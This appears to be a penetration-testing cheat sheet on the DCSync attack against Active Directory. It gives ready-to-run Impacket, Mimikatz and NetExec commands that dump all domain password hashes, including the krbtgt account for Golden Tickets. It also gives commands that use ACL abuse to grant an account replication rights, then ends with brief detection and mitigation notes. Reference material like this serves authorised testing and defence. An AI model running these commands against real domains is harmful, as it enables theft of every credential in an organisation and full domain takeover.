DCSync
Overview
DCSync abuses Active Directory replication to request password hashes directly from a Domain Controller. Instead of running code on the DC or extracting NTDS.dit, DCSync uses the Directory Replication Service (DRS) protocol to replicate user credentials remotely. This requires the Replicating Directory Changes and Replicating Directory Changes All privileges — held by default by Domain Admins, Enterprise Admins, and the DC computer accounts.
ATT&CK Mapping
- Tactic: TA0006 - Credential Access
- Technique: T1003.006 - OS Credential Dumping: DCSync
Prerequisites
- Account with replication privileges (
Replicating Directory Changes+Replicating Directory Changes All) - Default groups with these rights: Domain Admins, Enterprise Admins, DC computer accounts
- Network access to the DC (LDAP/RPC)
Techniques
DCSync with Impacket
# Impacket — dump all domain hashes
# https://github.com/fortra/impacket
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc
# Dump specific user
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-user 'Administrator'
# Dump krbtgt (for Golden Ticket)
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-user 'krbtgt'
# With NTLM hash (pass-the-hash)
impacket-secretsdump '<domain>/<admin>@<dc_ip>' -hashes ':<ntlm_hash>' -just-dc
# With Kerberos ticket
export KRB5CCNAME=admin.ccache
impacket-secretsdump '<domain>/<admin>@<dc_hostname>' -k -no-pass -just-dc
# Dump only NTLM hashes (skip Kerberos keys)
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-ntlm
DCSync with Mimikatz
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# DCSync specific user
mimikatz# lsadump::dcsync /domain:<domain> /user:Administrator
# DCSync krbtgt
mimikatz# lsadump::dcsync /domain:<domain> /user:krbtgt
# DCSync all accounts
mimikatz# lsadump::dcsync /domain:<domain> /all /csv
DCSync with NetExec
# NetExec — dump NTDS.dit hashes via DCSync
# https://github.com/Pennyw0rth/NetExec
nxc smb <dc_ip> -u <admin> -p <password> --ntds
# With hash
nxc smb <dc_ip> -u <admin> -H <ntlm_hash> --ntds
Check DCSync Permissions
Before attempting DCSync, verify if your account has the required permissions:
# Impacket — check if secretsdump works
# https://github.com/fortra/impacket
impacket-secretsdump '<domain>/<user>:<password>@<dc_ip>' -just-dc-user 'krbtgt' 2>&1
# PowerShell — check replication rights
(Get-ACL "AD:DC=domain,DC=local").Access | Where-Object {
$_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or
$_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
} | Select-Object IdentityReference
Grant DCSync Rights (ACL Abuse)
If you have WriteDACL on the domain object, you can grant yourself DCSync rights:
# Impacket — add DCSync rights
# https://github.com/fortra/impacket
impacket-dacledit '<domain>/<user>:<password>' -action write -rights DCSync -principal '<target_user>' -target-dn 'DC=domain,DC=local' -dc-ip <dc_ip>
# PowerShell
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <user> -Rights DCSync
Detection Methods
Network-Based Detection
- DRS replication requests (DsGetNCChanges) from non-DC sources
- RPC traffic on port 135/dynamic ports from unexpected hosts to DCs
Host-Based Detection
- Windows Security Event 4662 — access to directory service objects with replication GUIDs:
1131f6aa-9c07-11d1-f79f-00c04fc2dcd2(Replicating Directory Changes)1131f6ad-9c07-11d1-f79f-00c04fc2dcd2(Replicating Directory Changes All)- Event 4662 from non-DC computer accounts indicates DCSync attack
Mitigation Strategies
- Audit replication permissions — ensure only DCs and authorized accounts have replication rights
- Monitor Event 4662 — alert on replication requests from non-DC sources
- Remove unnecessary privileges — audit accounts with
Replicating Directory Changes All - Network monitoring — detect DRS traffic from non-DC hosts